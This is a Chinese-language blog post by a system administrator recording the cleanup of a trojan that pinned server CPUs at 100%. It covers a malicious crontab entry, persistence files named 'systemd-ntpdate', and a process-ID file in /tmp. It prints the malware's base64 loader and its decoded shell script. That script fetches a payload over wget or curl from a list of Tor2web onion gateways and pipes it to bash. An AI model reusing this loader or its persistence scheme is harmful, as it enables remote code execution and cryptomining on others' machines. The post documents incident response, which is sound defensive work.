CPU占用100%的Systemd木马问题解决

简介最近公司服务器出现几台服务器的CPU一直在100%的状态，肯定是中了木马或者被攻击，本文主要记录下如何处理该木马病毒。
1、使用htop命令查看cpu占用较高的进程
这里不附图，会出现莫名奇妙的个一些进程名称，如XMJwux、90xym5，长度基本都是六位。

2、通过第一步的进程号名称找到对应的进程号kill掉
3、执行完上面一步以为就完了，可以休息下了…，过了十多分钟，CPU又达到百分之百了，不想让我安静会啊！
4、既然kill掉了又启动了，那么肯定有定时任务，进入到定时任务中去
[root@local~]# crontab -e
15 * * * * /root/.systemd-ntpdate cn.pool.ntp.org >/dev/null 2>&1
果不其然，真的有一个定时任务

5、查看/root/.systemd-ntpdate这个文件
#!/bin/bash
exec &>/dev/null
#ntpdate pool.ntp.org
sleep 536
echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KdD10b3JudHBheG53Nnl4aGw0CnUoKSB7Cng9L2Nybgp3Z2V0IC10MSAtDE4MCAtcVUtIC1PLSAtLW5vLWNoZWNrLWNlcnRpZmljYXRlICQxJHggfHwgY3VybCAtbTE4MCAtZnNTTGtBLSAkMSR4Cn0KaWYgISBscyAvcHJvYy8kKGNhdCAvdG1wLy5YMTEtdW5peC8wMSkvaW87IHRoZW4KKAp1ICR0Lm9uaW9uLmdsYXNzIHx8CngJHQuY2l2aWNsaW5rLm5ldHdvcmsgfHwKdSAkdC5vbmlvbi5tbiB8fAp1ICR0Lm9uaW9uLnNoIHx8CnUgJHQub25pb24uaW4ubmV0IHx8CnUgJHQudG9yMndlYi5pbyB8fAp1ICR0LjR0b3IubWwgfHwKdSAkdC5vbmlvbi50bwopfGJhc2gKZmkK|bas64 -d|bash
哎呦，这还base64了，找个工具解析下，真是内容如下：

exec &>/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
t=torntpaxnw6yxhl4
u() {
x=/crn
wget -t1 -T180 -qU- -O- --no-check-certificate $1$x || curl -m180 -fsSLkA- $1$x
}
if ! ls /proc/$(cat /tmp/.X11-unix/01)/io; then
(
u $t.onion.glass ||
u $t.civiclink.network ||
u $t.onion.mn ||
u $t.onion.sh ||
u $t.onion.in.net ||
u $t.tor2web.io ||
u $t.4tor.ml ||
u $t.onion.to
)|bash
fi
从这段shell代码中能看出，/tmp/.X11-unix/01文件还有点关键

6、查看/tmp/.X11-unix/01，里面有一个号30017（可能读者跟我的不一致），再查找这个进程ID，居然真还有这个进程在运行，不管三七二十一，先kill掉
7、然后再查阅了相关资料，网上很多，这里不列举了，还找到了四个地方出现了systemd-ntpdate跟这个名字一样的文件
/lib/systemd/systemd-ntpdate
/root/.systemd-ntpdate
/root/.systemd-ntpdate.bak
/etc/cron.d/0systemd-ntpdate
查看里面的内容，跟前面的一模一样。不管，删掉。

8、基本处理完成，还在观察中
9、具体为什么会中病毒，这个也还在查询资料中